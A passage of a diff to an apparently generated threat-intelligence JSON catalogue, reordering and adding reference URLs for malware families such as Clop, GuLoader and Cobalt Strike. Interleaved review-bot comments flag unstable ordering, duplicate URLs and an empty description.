"https://asec.ahnlab.com/wp-content/uploads/2021/01/Analysis_ReportCLOP_Ransomware.pdf", - "https://www.notion.so/S2W-LAB-Analysis-of-Clop-Ransomware-suspiciously-related-to-the-Recent-Incident-c26daec604da4db6b3c93e26e6c7aa26", - "https://www.telekom.com/en/blog/group/article/inside-of-cl0p-s-ransomware-operation-615824", - "https://www.boho.or.kr/filedownload.do?attach_file_seq=2808&attach_file_id=EpF2808.pdf", - "https://securelist.com/modern-ransomware-groups-ttps/106824/", - 
"https://web.archive.org/web/20210305181115/https://cisoclub.ru/doc/otchet-kompanii-group-ib-ransomware-uncovered-2020-2021/?bp-attachment=group-ib_ransomware_uncovered_2020-2021.pdf", - "https://www.cert.ssi.gouv.fr/uploads/CERTFR-2020-CTI-006.pdf", - "https://unit42.paloaltonetworks.com/clop-ransomware/", - "https://www.telekom.com/en/blog/group/article/eager-beaver-a-short-overview-of-the-restless-threat-actor-ta505-609546", - "https://www.zdnet.com/article/the-malware-that-usually-installs-ransomware-and-you-need-to-remove-right-away/", - "https://medium.com/s2wlab/operation-synctrek-e5013df8d167", - "https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2021GTR.pdf", - "https://www.crowdstrike.com/blog/how-big-game-hunting-ttps-shifted-after-darkside-pipeline-attack/", - "https://cisoclub.ru/doc/otchet-kompanii-group-ib-ransomware-uncovered-2020-2021/?bp-attachment=group-ib_ransomware_uncovered_2020-2021.pdf", - "https://github.com/albertzsigovits/malware-notes/blob/master/Clop.md", - "https://www.cronup.com/post/de-ataque-con-malware-a-incidente-de-ransomware", + "https://www.binance.com/en/blog/421499824684902240/Binance-Helps-Take-Down-Cybercriminal-Ring-Laundering-%24500M-in-Ransomware-Attacks", + "https://twitter.com/darb0ng/status/1338692764121251840", "https://www.secureworks.com/research/threat-profiles/gold-tahoe", - "https://blog.sensecy.com/2020/08/20/global-ransomware-attacks-in-2020-the-top-4-vulnerabilities/", - "https://asec.ahnlab.com/en/19542/", - "https://www.flashpoint-intel.com/blog/cl0p-and-revil-escalate-their-ransomware-tactics/", - "https://medium.com/@Sebdraven/unpacking-clop-416b83718e0f", - "https://www.bleepingcomputer.com/news/security/clop-ransomware-gang-is-back-hits-21-victims-in-a-single-month/" + "https://public.intel471.com/blog/ransomware-as-a-service-2020-ryuk-maze-revil-egregor-doppelpaymer/", + 
"https://www.advanced-intel.com/post/adversarial-perspective-advintel-breach-avoidance-through-monitoring-initial-vulnerabilities", + "https://www.carbonblack.com/blog/cb-tau-threat-intelligence-notification-cryptomix-clop-ransomware-disables-startup-repair-removes-edits-shadow-volume-copies/", + "https://www.zdnet.com/article/german-tech-giant-software-ag-down-after-ransomware-attack/", + "https://www.bleepingcomputer.com/news/security/ransomware-gang-urges-victims-customers-to-demand-a-ransom-payment/", + "https://blog.fox-it.com/2020/11/16/ta505-a-brief-history-of-their-time/", + "https://fourcore.io/blogs/clop-ransomware-history-adversary-simulation", + "https://www.notion.so/S2W-LAB-Analysis-of-Clop-Ransomware-suspiciously-related-to-the-Recent-Incident-English-088056baf01242409a6e9f844f0c5f2e", + "https://www.cert.ssi.gouv.fr/uploads/CERTFR-2020-CTI-001.pdf", + "https://www.fireeye.com/blog/threat-research/2021/02/accellion-fta-exploited-for-data-theft-and-extortion.html", + "https://www.cert.ssi.gouv.fr/uploads/CERTFR-2020-CTI-006.pdf" ], "synonyms": [], "type": [] @@ -17954,7 +18814,8 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.cloudburst", - "https://www.mandiant.com/resources/blog/lightshow-north-korea-unc2970" + "https://www.mandiant.com/resources/blog/lightshow-north-korea-unc2970", + "https://www.microsoft.com/security/blog/2022/09/29/zinc-weaponizing-open-source-software/" ], "synonyms": [], "type": [] 
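Review bot: Almost every reference in the Clop hunk is removed and re-added at a different position while only three URLs are actually new (the Talos Q2 2023 IR recap, the loginsoft CVE-2023-27350 write-up and the fourcore adversary-simulation post), so reviewing what changed means diffing two ~80-entry lists by hand. If the generator emitted `refs` in a stable order (sorted, or upstream insertion order) each regeneration would show only the genuine additions and removals. The reorder also preserves near-duplicates the new side still carries — `cisoclub.ru/...group-ib_ransomware_uncovered_2020-2021.pdf` next to its `web.archive.org` snapshot, `malware-notes/blob/master/Clop.md` next to `malware-notes/blob/master/Ransomware/Clop.md`, and two notion.so variants of the same S2W analysis — which a dedup pass at generation time could fold; these predate the commit, so the fix belongs in the generator rather than in this hunk.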
@@ -17967,58 +18828,66 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.cloudeye", - "https://labs.k7computing.com/?p=20156", - "https://www.joesecurity.org/blog/3535317197858305930", - "https://blog.morphisec.com/guloader-the-rat-downloader", - "https://threatresearch.ext.hp.com/malware-campaigns-targeting-african-banking-sector/", - "https://0x00sec.org/t/analyzing-modern-malware-techniques-part-3/18943", - "https://blog.checkpoint.com/security/march-2023s-most-wanted-malware-new-emotet-campaign-bypasses-microsoft-blocks-to-distribute-malicious-onenote-files/", - "https://threatresearch.ext.hp.com/wp-content/uploads/2021/10/HP-Wolf-Security-Threat-Insights-Report-Q3-2021.pdf", - "https://twitter.com/sysopfb/status/1258809373159305216", - "https://malpedia.caad.fkie.fraunhofer.de/details/win.guloader", - "https://www.youtube.com/watch?v=-FxyzuRv6Wg", - "https://labs.bitdefender.com/2020/03/5-times-more-coronavirus-themed-malware-reports-during-march/?utm_campaign=twitter&utm_medium=twitter&utm_source=twitter", - "https://research.checkpoint.com/2020/guloader-cloudeye/", - "https://twitter.com/TheEnergyStory/status/1240608893610459138", - "https://cert.pl/en/posts/2021/04/keeping-an-eye-on-guloader-reverse-engineering-the-loader/", - "https://www.youtube.com/watch?v=N0wAh26wShE", - "https://experience.mandiant.com/trending-evil-2/p/1", - "https://www.trendmicro.com/content/dam/trendmicro/global/en/research/21/i/ssl-tls-technical-brief/ssl-tls-technical-brief.pdf", - "https://www.youtube.com/watch?v=K3Yxu_9OUxU", - "https://www.crowdstrike.com/blog/guloader-dissection-reveals-new-anti-analysis-techniques-and-code-injection-redundancy/", - "https://unit42.paloaltonetworks.com/guloader-installing-netwire-rat/", - "https://twitter.com/TheEnergyStory/status/1239110192060608513", - "https://research.checkpoint.com/2020/threat-actors-migrating-to-the-cloud/", - 
"https://threatresearch.ext.hp.com/javascript-malware-dispensing-rats-into-the-wild/", - "https://hidocohen.medium.com/guloaders-anti-analysis-techniques-e0d4b8437195", - "https://www.fortinet.com/blog/threat-research/spoofed-saudi-purchase-order-drops-guloader-part-two", - "https://www.spamhaus.com/resource-center/dissecting-the-new-shellcode-based-variant-of-guloader-cloudeye/", - "https://twitter.com/VK_Intel/status/1255537954304524288", - "https://www.vmray.com/cyber-security-blog/guloader-evasion-techniques-threat-bulletin/", - "https://www.vmray.com/cyber-security-blog/azorult-delivered-by-guloader-malware-analysis-spotlight/", - "https://www.microsoft.com/en-us/security/blog/2023/04/13/threat-actors-strive-to-cause-tax-day-headaches/", - "https://forensicitguy.github.io/guloader-executing-shellcode-callbacks/", - "https://www.crowdstrike.com/blog/guloader-malware-analysis/", - "https://www.proofpoint.com/us/threat-insight/post/coronavirus-threat-landscape-update", - "https://www.proofpoint.com/us/threat-insight/post/guloader-popular-new-vb6-downloader-abuses-cloud-services", - "https://www.blueliv.com/cyber-security-and-cyber-threat-intelligence-blog-blueliv/research/playing-with-guloader-anti-vm-techniques-malware/", - "https://blog.vincss.net/2020/05/re014-guloader-antivm-techniques.html", - "https://elis531989.medium.com/dancing-with-shellcodes-cracking-the-latest-version-of-guloader-75083fb15cb4", - "https://kienmanowar.wordpress.com/2020/06/27/quick-analysis-note-about-guloader-or-cloudeye/", - "https://cert-agid.gov.it/news/malware/tecniche-per-semplificare-lanalisi-del-malware-guloader/", - "https://twitter.com/VK_Intel/status/1252678206852907011", - "https://www.proofpoint.com/us/blog/threat-insight/hakbit-ransomware-campaign-against-germany-austria-switzerland", - "https://inquest.net/blog/2022/08/29/office-files-rtf-files-shellcode-and-more-shenanigans", - "https://www.vmray.com/cyber-security-blog/malware-analysis-spotlight-guloader", - 
"https://clickallthethings.wordpress.com/2021/03/06/oleobject1-bin-ole10native-shellcode/", - "https://umbrella.cisco.com/blog/navigating-cybersecurity-during-a-pandemic-latest-malware-and-threat-actors", + "https://asec.ahnlab.com/en/55978/", "https://news.sophos.com/en-us/2020/07/14/raticate-rats-as-service-with-commercial-crypter/?cmp=30728", - "https://blog.malwarebytes.com/scams/2020/08/sba-phishing-scams-from-malware-to-advanced-social-engineering/", - "https://twitter.com/VK_Intel/status/1257206565146370050", - "https://medium.com/@ZainWare/analyzing-guloader-42c1d6a73dfa", + "https://www.youtube.com/watch?v=K3Yxu_9OUxU", + "https://experience.mandiant.com/trending-evil-2/p/1", + "https://www.crowdstrike.com/blog/guloader-dissection-reveals-new-anti-analysis-techniques-and-code-injection-redundancy/", + "https://twitter.com/TheEnergyStory/status/1239110192060608513", + "https://www.youtube.com/watch?v=-FxyzuRv6Wg", + "https://threatresearch.ext.hp.com/wp-content/uploads/2021/10/HP-Wolf-Security-Threat-Insights-Report-Q3-2021.pdf", + "https://kienmanowar.wordpress.com/2020/06/27/quick-analysis-note-about-guloader-or-cloudeye/", + "https://research.checkpoint.com/2023/unveiling-the-shadows-the-dark-alliance-between-guloader-and-remcos/", + "https://research.checkpoint.com/2020/threat-actors-migrating-to-the-cloud/", + "https://www.fortinet.com/blog/threat-research/spoofed-saudi-purchase-order-drops-guloader-part-two", + "https://www.joesecurity.org/blog/3535317197858305930", + "https://forensicitguy.github.io/guloader-executing-shellcode-callbacks/", + "https://cert.pl/en/posts/2021/04/keeping-an-eye-on-guloader-reverse-engineering-the-loader/", + "https://labs.vipre.com/unloading-the-guloader/", + "https://www.spamhaus.com/resource-center/dissecting-the-new-shellcode-based-variant-of-guloader-cloudeye/", + "https://www.youtube.com/watch?v=N0wAh26wShE", "https://malwation.com/malware-config-extraction-diaries-1-guloader/", 
"https://labs.k7computing.com/?p=21725Lokesh", - "https://labs.vipre.com/unloading-the-guloader/" + "https://sansorg.egnyte.com/dl/ALlvwK6fp0", + "https://twitter.com/VK_Intel/status/1257206565146370050", + "https://www.vmray.com/cyber-security-blog/azorult-delivered-by-guloader-malware-analysis-spotlight/", + "https://clickallthethings.wordpress.com/2021/03/06/oleobject1-bin-ole10native-shellcode/", + "https://labs.k7computing.com/?p=20156", + "https://blog.malwarebytes.com/scams/2020/08/sba-phishing-scams-from-malware-to-advanced-social-engineering/", + "https://labs.bitdefender.com/2020/03/5-times-more-coronavirus-themed-malware-reports-during-march/?utm_campaign=twitter&utm_medium=twitter&utm_source=twitter", + "https://twitter.com/VK_Intel/status/1255537954304524288", + "https://malwarebookreports.com/guloader-navigating-a-maze-of-intricacy/", + "https://threatresearch.ext.hp.com/malware-campaigns-targeting-african-banking-sector/", + "https://twitter.com/TheEnergyStory/status/1240608893610459138", + "https://blog.checkpoint.com/security/march-2023s-most-wanted-malware-new-emotet-campaign-bypasses-microsoft-blocks-to-distribute-malicious-onenote-files/", + "https://umbrella.cisco.com/blog/navigating-cybersecurity-during-a-pandemic-latest-malware-and-threat-actors", + "https://blog.morphisec.com/guloader-the-rat-downloader", + "https://inquest.net/blog/2022/08/29/office-files-rtf-files-shellcode-and-more-shenanigans", + "https://malpedia.caad.fkie.fraunhofer.de/details/win.guloader", + "https://0x00sec.org/t/analyzing-modern-malware-techniques-part-3/18943", + "https://hidocohen.medium.com/guloaders-anti-analysis-techniques-e0d4b8437195", + "https://www.blueliv.com/cyber-security-and-cyber-threat-intelligence-blog-blueliv/research/playing-with-guloader-anti-vm-techniques-malware/", + "https://www.crowdstrike.com/blog/guloader-malware-analysis/", + "https://any.run/cybersecurity-blog/deobfuscating-guloader/", + 
"https://unit42.paloaltonetworks.com/guloader-installing-netwire-rat/", + "https://twitter.com/sysopfb/status/1258809373159305216", + "https://blog.vincss.net/2020/05/re014-guloader-antivm-techniques.html", + "https://elis531989.medium.com/dancing-with-shellcodes-cracking-the-latest-version-of-guloader-75083fb15cb4", + "https://www.vmray.com/cyber-security-blog/malware-analysis-spotlight-guloader", + "https://research.checkpoint.com/2023/cloud-based-malware-delivery-the-evolution-of-guloader/", + "https://twitter.com/VK_Intel/status/1252678206852907011", + "https://www.microsoft.com/en-us/security/blog/2023/04/13/threat-actors-strive-to-cause-tax-day-headaches/", + "https://www.proofpoint.com/us/threat-insight/post/coronavirus-threat-landscape-update", + "https://threatresearch.ext.hp.com/javascript-malware-dispensing-rats-into-the-wild/", + "https://www.trendmicro.com/content/dam/trendmicro/global/en/research/21/i/ssl-tls-technical-brief/ssl-tls-technical-brief.pdf", + "https://research.checkpoint.com/2020/guloader-cloudeye/", + "https://www.proofpoint.com/us/blog/threat-insight/hakbit-ransomware-campaign-against-germany-austria-switzerland", + "https://www.vmray.com/cyber-security-blog/guloader-evasion-techniques-threat-bulletin/", + "https://medium.com/@ZainWare/analyzing-guloader-42c1d6a73dfa", + "https://www.proofpoint.com/us/threat-insight/post/guloader-popular-new-vb6-downloader-abuses-cloud-services", + "https://cert-agid.gov.it/news/malware/tecniche-per-semplificare-lanalisi-del-malware-guloader/", + "https://www.youtube.com/watch?v=gk7fCC5RiAQ", + "https://gi7w0rm.medium.com/cloudeye-from-lnk-to-shellcode-4b5f1d6d877" ], "synonyms": [ "GuLoader", 
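Review bot: The context line `"https://labs.k7computing.com/?p=21725Lokesh"` survives onto the new side unchanged, and the trailing `Lokesh` after the numeric WordPress post id looks like an author name concatenated onto the URL during import rather than part of the address; it should probably read `"https://labs.k7computing.com/?p=21725"`, after checking that the id resolves to the GuLoader post. The newly added `"https://sansorg.egnyte.com/dl/ALlvwK6fp0"` is an opaque file-share download with no title or stable identity, so if a canonical SANS reading-room page for that paper exists it would be the more durable reference. As with the rest of this regeneration, both corrections belong in the upstream source the file is built from rather than in a hand edit of the JSON.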
@@ -18029,6 +18898,19 @@
"uuid": "966f54ae-1781-4f2e-8b32-57a242a00bb9",
"value": "CloudEyE"
},
+ {
+ "description": "",
+ "meta": {
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.cloudwizard",
+ "https://securelist.com/cloudwizard-apt/109722/"
+ ],
+ "synonyms": [],
+ "type": []
+ },
+ "uuid": "4d941367-b22e-4d01-930e-c757b58eff58",
+ "value": "CloudWizard"
+ },
{
"description": "F-Secure describes CloudDuke as a malware toolset known to consist of, at least, a downloader, a loader and two backdoor variants. The CloudDuke downloader will download and execute additional malware from a preconfigured location. Interestingly, that location may be either a web address or a Microsoft OneDrive account. Both CloudDuke backdoor variants support simple backdoor functionality, similar to SeaDuke. While one variant will use a preconfigured C&C server over HTTP or HTTPS, the other variant will use a Microsoft OneDrive account to exchange commands and stolen data with its operators.",
"meta": {
@@ -18064,9 +18946,9 @@
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.cmstar",
"https://twitter.com/ClearskySec/status/963829930776723461",
- "https://researchcenter.paloaltonetworks.com/2017/09/unit42-threat-actors-target-government-belarus-using-cmstar-trojan",
"https://researchcenter.paloaltonetworks.com/2016/03/digital-quartermaster-scenario-demonstrated-in-attacks-against-the-mongolian-government/",
- "https://unit42.paloaltonetworks.com/unit42-threat-actors-target-government-belarus-using-cmstar-trojan"
+ "https://unit42.paloaltonetworks.com/unit42-threat-actors-target-government-belarus-using-cmstar-trojan",
+ "https://researchcenter.paloaltonetworks.com/2017/09/unit42-threat-actors-target-government-belarus-using-cmstar-trojan"
],
"synonyms": [
"meciv"
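Review bot: The CloudWizard entry is added with `"description": ""` and `"type": []`, leaving the securelist URL as the only hint of what it is; the ref slug `cloudwizard-apt` indicates a Kaspersky APT report, but the cluster itself states nothing, so anything keyed on this UUID shows a bare name. A one-line description drawn from that report — or, if only the title is known, a hedged one such as `"description": "Malware framework described in Kaspersky's CloudWizard APT report (see refs)."` — would make the entry usable without following the link; if the file is generated, the text should be added at the source.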
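Review bot: After the reorder the cmstar `refs` list still contains the same Unit 42 article twice — `https://researchcenter.paloaltonetworks.com/2017/09/unit42-threat-actors-target-government-belarus-using-cmstar-trojan` and `https://unit42.paloaltonetworks.com/unit42-threat-actors-target-government-belarus-using-cmstar-trojan` share the slug and differ only in the hostname and the date prefix, the `researchcenter` form most likely being the older address of the same post. Keeping a single entry (the `unit42.paloaltonetworks.com` one, if it is the form that still resolves) would avoid counting one source twice; the duplicate predates this commit, so the fix is a dedup step in the generator rather than an edit to this hunk.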
@@ -18081,8 +18963,8 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.coalabot",
- "https://medium.com/csis-techblog/inside-view-of-brazzzersff-infrastructure-89b9188fd145",
- "https://malware.dontneedcoffee.com/2017/10/coalabot-http-ddos-bot.html"
+ "https://malware.dontneedcoffee.com/2017/10/coalabot-http-ddos-bot.html",
+ "https://medium.com/csis-techblog/inside-view-of-brazzzersff-infrastructure-89b9188fd145"
],
"synonyms": [],
"type": []
@@ -18095,8 +18977,8 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.cobaltmirage_tunnel",
- "https://www.deepinstinct.com/blog/iranian-threat-actor-continues-to-develop-mass-exploitation-tools",
- "https://www.secureworks.com/blog/cobalt-mirage-conducts-ransomware-operations-in-us"
+ "https://www.secureworks.com/blog/cobalt-mirage-conducts-ransomware-operations-in-us",
+ "https://www.deepinstinct.com/blog/iranian-threat-actor-continues-to-develop-mass-exploitation-tools"
],
"synonyms": [],
"type": []
@@ -18109,649 +18991,667 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.cobalt_strike", - "https://securelist.com/apt-trends-report-q2-2020/97937/", - "https://www.mcafee.com/blogs/other-blogs/mcafee-labs/csi-evidence-indicators-for-targeted-ransomware-attacks-part-ii/", - "https://securityscorecard.com/research/the-increase-in-ransomware-attacks-on-local-governments", - "https://www.unh4ck.com/detection-engineering-and-threat-hunting/lateral-movement/detecting-conti-cobaltstrike-lateral-movement-techniques-part-2", - "https://www.brighttalk.com/webcast/7451/462719", - "https://www.kroll.com/en/insights/publications/cyber/hive-ransomware-technical-analysis-initial-access-discovery", - "https://isc.sans.edu/diary/27308", - "https://www.advintel.io/post/24-hours-from-log4shell-to-local-admin-deep-dive-into-conti-gang-attack-on-fortune-500-dfir", - "https://www.telsy.com/legitimate-sites-used-as-cobalt-strike-c2s-against-indian-government/", - "https://research.checkpoint.com/2019/rancor-the-year-of-the-phish/", - "https://michaelkoczwara.medium.com/cobalt-strike-hunting-simple-pcap-and-beacon-analysis-f51c36ce6811", - "https://www.cybereason.com/blog/cybereason-vs-egregor-ransomware", - "https://cert.ssi.gouv.fr/uploads/20220427_NP_TLPWHITE_ANSSI_FIN7.pdf", - "https://www.cert.ssi.gouv.fr/cti/CERTFR-2021-CTI-011/", - "https://www.silentpush.com/blog/consequences-the-conti-leaks-and-future-problems", - "https://blog.netlab.360.com/blackrota-an-obfuscated-backdoor-written-in-go/", - "https://www.trendmicro.com/en_in/research/21/k/analyzing-proxyshell-related-incidents-via-trend-micro-managed-x.html", - "https://github.com/chronicle/GCTI", - "https://www.esentire.com/blog/conti-affiliate-exposed-new-domain-names-ip-addresses-and-email-addresses-uncovered-by-esentire", - "https://www.cyberark.com/resources/threat-research/analyzing-malware-with-hooks-stomps-and-return-addresses-2", - 
"https://www.randhome.io/blog/2020/12/20/analyzing-cobalt-strike-for-fun-and-profit/", - "https://research.nccgroup.com/2022/03/25/mining-data-from-cobalt-strike-beacons/", - "https://www.sentinelone.com/labs/lockbit-ransomware-side-loads-cobalt-strike-beacon-with-legitimate-vmware-utility/", - "https://thedfirreport.com/2021/01/31/bazar-no-ryuk/", - "https://github.com/JPCERTCC/aa-tools/blob/master/cobaltstrikescan.py", - "https://www.sentinelone.com/blog/bluesky-ransomware-ad-lateral-movement-evasion-and-fast-encryption-puts-threat-on-the-radar/", - "https://grimminck.medium.com/spoofing-jarm-signatures-i-am-the-cobalt-strike-server-now-a27bd549fc6b", - "https://ti.qianxin.com/blog/articles/Operation-OceanStorm:The-OceanLotus-hidden-under-the-abyss-of-the-deep/", - "http://www.secureworks.com/research/threat-profiles/gold-drake", - "https://intel471.com/blog/china-cybercrime-undergrond-deepmix-tea-horse-road-great-firewall/", - "https://www.ptsecurity.com/ww-en/analytics/pt-esc-threat-intelligence/higaisa-or-winnti-apt-41-backdoors-old-and-new/", - "https://www.zdnet.com/article/the-malware-that-usually-installs-ransomware-and-you-need-to-remove-right-away/", - "https://www.cynet.com/attack-techniques-hands-on/quakbot-strikes-with-quaknightmare-exploitation/", - "https://community.riskiq.com/article/c88cf7e6", - "https://www.mandiant.com/resources/blog/phished-at-the-request-of-counsel", - "https://www.advanced-intel.com/post/anatomy-of-attack-inside-bazarbackdoor-to-ryuk-ransomware-one-group-via-cobalt-strike", - "https://cpj.org/2021/02/vietnam-based-hacking-oceanlotus-targets-journalists", - "https://www.esentire.com/blog/increase-in-emotet-activity-and-cobalt-strike-deployment", - "https://isc.sans.edu/diary/rss/28664", - "https://www.trendmicro.com/en_us/research/21/g/tracking_cobalt_strike_a_vision_one_investigation.html", - "https://www.secureworks.com/blog/detecting-cobalt-strike-cybercrime-attacks", - 
"https://thedfirreport.com/2021/09/13/bazarloader-to-conti-ransomware-in-32-hours/", - "https://www.zscaler.com/blogs/security-research/onenote-growing-threat-malware-distribution", - "https://malwarebookreports.com/cryptone-cobalt-strike/", - "https://thedfirreport.com/2022/09/12/dead-or-alive-an-emotet-story/", - "https://www.trendmicro.com/vinfo/us/security/news/ransomware-spotlight/ransomware-spotlight-blackbasta", - "https://www.advintel.io/post/enter-karakurt-data-extortion-arm-of-prolific-ransomware-group", - "https://www.sentinelone.com/blog/threat-actor-uac-0056-targeting-ukraine-with-fake-translation-software/", - "https://elastic.github.io/security-research/intelligence/2022/01/03.extracting-cobalt-strike-beacon/article/", - "https://thedfirreport.com/2021/05/02/trickbot-brief-creds-and-beacons/", - "https://www.bleepingcomputer.com/news/security/fake-antivirus-updates-used-to-deploy-cobalt-strike-in-ukraine/", - "https://www.scmagazine.com/brief/breach/novel-obfuscation-leveraged-by-hive-ransomware", - "https://www.trendmicro.com/vinfo/us/security/news/cybercrime-and-digital-threats/locked-loaded-and-in-the-wrong-hands-legitimate-tools-weaponized-for-ransomware-in-2021", - "https://www.blackberry.com/content/dam/blackberry-com/asset/enterprise/pdf/direct/bb-ebook-finding-beacons-in-the-dark.pdf", - "https://blog.talosintelligence.com/2020/02/building-bypass-with-msbuild.html", - "https://blog.google/threat-analysis-group/exposing-initial-access-broker-ties-conti/", - "https://teamt5.org/tw/posts/mjib-holds-briefing-on-chinese-hackers-attacks-on-taiwanese-government-agencies/", - "https://www.mandiant.com/resources/apt41-us-state-governments", - "https://www.unh4ck.com/detection-engineering-and-threat-hunting/lateral-movement/detecting-conti-cobaltstrike-lateral-movement-techniques-part-1", - "https://norfolkinfosec.com/jeshell-an-oceanlotus-apt32-backdoor/", - "https://symantec.broadcom.com/hubfs/The_Ransomware_Threat_September_2021.pdf", - 
"https://twitter.com/AltShiftPrtScn/status/1403707430765273095", - "https://www.sentinelone.com/labs/lockbit-ransomware-side-loads-cobalt-strike-beacon-with-legitimate-vmware-utility", - "https://www.huntress.com/blog/hackers-no-hashing-randomizing-api-hashes-to-evade-cobalt-strike-shellcode-detection", - "https://unit42.paloaltonetworks.com/cloaked-ursa-online-storage-services-campaigns/", - "https://www.trendmicro.com/en_us/research/21/d/hello-ransomware-uses-updated-china-chopper-web-shell-sharepoint-vulnerability.html", - "https://www.volexity.com/blog/2020/11/06/oceanlotus-extending-cyber-espionage-operations-through-fake-websites/", - "https://thedfirreport.com/2020/04/24/ursnif-via-lolbins/", - "https://www.trendmicro.com/en_us/research/20/i/u-s--justice-department-charges-apt41-hackers-over-global-cyberattacks.html", - "https://intel471.com/blog/conti-emotet-ransomware-conti-leaks", - "https://pkb1s.github.io/Relay-attacks-via-Cobalt-Strike-beacons/", - "https://businessinsights.bitdefender.com/tech-advisory-manageengine-cve-2022-47966", - "https://www.carbonblack.com/2020/03/26/the-dukes-of-moscow/", - "https://www.cert.ssi.gouv.fr/uploads/CERTFR-2021-CTI-009.pdf", - "https://blog.lumen.com/zuorat-hijacks-soho-routers-to-silently-stalk-networks/", - "https://isc.sans.edu/diary/rss/28752", - "https://blogs.vmware.com/networkvirtualization/2020/11/trick-or-threat-ryuk-ransomware-targets-the-health-care-industry.html/", - "https://cybersecurity.att.com/blogs/security-essentials/stories-from-the-soc-powershell-proxyshell-conti-ttps-oh-my", - "https://hello.global.ntt/-/media/ntt/global/insights/white-papers/the-operations-of-winnti-group.pdf", - "https://www.blackarrow.net/leveraging-microsoft-teams-to-persist-and-cover-up-cobalt-strike-traffic/", - "https://talos-intelligence-site.s3.amazonaws.com/production/document_files/files/000/095/031/original/Talos_Cobalt_Strike.pdf", - 
"https://speakerdeck.com/aragorntseng/winnti-is-coming-evolution-after-prosecution-at-hitcon2021", - "https://isc.sans.edu/forums/diary/Excel+spreadsheets+push+SystemBC+malware/27060/", - "https://www.aon.com/cyber-solutions/aon_cyber_labs/cobalt-strike-configuration-extractor-and-parser/", - "https://twitter.com/Unit42_Intel/status/1458113934024757256", - "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/yanluowang-ransomware-attacks-continue", - "https://cert.gov.ua/article/703548", - "https://labs.f-secure.com/blog/detecting-cobalt-strike-default-modules-via-named-pipe-analysis", - "https://github.com/ThreatConnect-Inc/research-team/blob/master/IOCs/WizardSpider-UNC1878-Ryuk.csv", - "https://twitter.com/TheDFIRReport/status/1356729371931860992", + "https://mergene.medium.com/enterprise-scale-threat-hunting-network-beacon-detection-with-unsupervised-machine-learning-and-277c4c30304f", "https://unit42.paloaltonetworks.com/atoms/obscureserpens/", - "https://news.sophos.com/en-us/2022/08/18/cookie-stealing-the-new-perimeter-bypass", - "https://www.malware-traffic-analysis.net/2021/09/29/index.html", - "https://www.microsoft.com/security/blog/2021/05/27/new-sophisticated-email-based-attack-from-nobelium/", - "https://www.secureworks.com/research/threat-profiles/tin-woodlawn", - "https://twitter.com/Unit42_Intel/status/1461004489234829320", - "https://us-cert.cisa.gov/ncas/analysis-reports/ar21-148a", - "https://www.accenture.com/us-en/blogs/cyber-defense/moving-left-ransomware-boom", - "https://www.trendmicro.com/en_us/research/21/g/biopass-rat-new-malware-sniffs-victims-via-live-streaming.html", - "https://nsfocusglobal.com/insights-into-ransomware-spread-using-exchange-1-day-vulnerabilities-1-2/", - "https://www.mandiant.com/media/10916/download", - "https://www.mandiant.com/resources/sabbath-ransomware-affiliate", - "https://www.cyber.gov.au/sites/default/files/2020-06/ACSC-Advisory-2020-008-Copy-Paste-Compromises.pdf", - 
"https://www.zscaler.com/blogs/research/targeted-attack-leverages-india-china-border-dispute-lure-victims", - "https://blog.reversinglabs.com/blog/threat-analysis-follina-exploit-powers-live-off-the-land-attacks", - "https://news.sophos.com/en-us/2021/05/18/the-active-adversary-playbook-2021/?cmp=37153", - "https://www.ptsecurity.com/ww-en/analytics/pt-esc-threat-intelligence/new-apt-group-chamelgang/#id3", - "https://noticeofpleadings.com/crackedcobaltstrike/files/ComplaintAndSummons/1%20-Microsoft%20Cobalt%20Strike%20-%20Complaint(907040021.9).pdf", - "https://www.cybereason.com/blog/threat-analysis-report-bumblebee-loader-the-high-road-to-enterprise-domain-control", - "https://www.sans.org/webcasts/contrarian-view-solarwinds-119515", - "https://blog.cobaltstrike.com/2020/11/06/cobalt-strike-4-2-everything-but-the-kitchen-sink/", - "https://blog.morphisec.com/log4j-exploit-targets-vulnerable-unifi-network-applications", - "https://i.blackhat.com/eu-20/Wednesday/eu-20-Clarke-Its-Not-FINished-The-Evolving-Maturity-In-Ransomware-Operations.pdf", - "https://www.bitsight.com/blog/emotet-botnet-rises-again", - "https://twitter.com/TheDFIRReport/status/1359669513520873473", - "https://twitter.com/Cryptolaemus1/status/1407135648528711680", - "https://www.arashparsa.com/hook-heaps-and-live-free/", - "https://www.qurium.org/alerts/targeted-malware-against-crph/", - "https://blog.nviso.eu/2022/07/20/analysis-of-a-trojanized-jquery-script-gootloader-unleashed/", - "https://www.trendmicro.com/en_us/research/21/a/earth-wendigo-injects-javascript-backdoor-to-service-worker-for-.html", - "https://www.fortinet.com/blog/threat-research/nobelium-returns-to-the-political-world-stage", - "https://kienmanowar.wordpress.com/2021/09/06/quick-analysis-cobaltstrike-loader-and-shellcode/", - "https://www.mandiant.com/resources/unc2452-merged-into-apt29", - "https://www.welivesecurity.com/2022/04/13/eset-takes-part-global-operation-disrupt-zloader-botnets/", - 
"https://malcat.fr/blog/lnk-forensic-and-config-extraction-of-a-cobalt-strike-beacon/", - "https://labs.sentinelone.com/hotcobalt-new-cobalt-strike-dos-vulnerability-that-lets-you-halt-operations/", - "https://assets.virustotal.com/reports/2021trends.pdf", - "https://research.nccgroup.com/2022/03/31/conti-nuation-methods-and-techniques-observed-in-operations-post-the-leaks/", - "https://medium.com/walmartglobaltech/trickbot-crews-new-cobaltstrike-loader-32c72b78e81c", - "https://blog.malwarebytes.com/threat-analysis/2020/07/chinese-apt-group-targets-india-and-hong-kong-using-new-variant-of-mgbot-malware/", - "https://www.trendmicro.com/vinfo/us/security/news/cyber-attacks/operation-drbcontrol-uncovering-a-cyberespionage-campaign-targeting-gambling-companies-in-southeast-asia", - "https://cybleinc.com/2020/11/17/oceanlotus-continues-with-its-cyber-espionage-operations/", - "https://www.truesec.com/hub/blog/proxyshell-qbot-and-conti-ransomware-combined-in-a-series-of-cyber-attacks", - "https://www.advanced-intel.com/post/front-door-into-bazarbackdoor-stealthy-cybercrime-weapon", - "https://www.arashparsa.com/catching-a-malware-with-no-name/", - 